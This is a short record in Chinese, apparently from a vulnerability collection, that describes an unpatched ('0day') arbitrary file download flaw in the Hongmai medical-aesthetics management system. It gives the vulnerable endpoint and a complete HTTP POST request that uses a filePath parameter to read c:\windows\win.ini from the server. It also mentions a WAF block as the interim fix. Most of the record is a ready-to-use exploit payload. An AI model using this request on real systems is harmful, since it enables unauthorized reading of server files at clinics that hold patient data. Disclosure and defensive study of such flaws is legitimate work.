vendor = "宏脉"
name = "宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞"
type = "任意文件下载"
version = "未知"
path = "/zh-CN/PublicInterface/DownLoadServerFile"
detail = "POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate filePath=c:\\windows\\win.ini"
fix = "WAF封禁路路径，等待发布补丁"
date = "0729"
label = "0day"
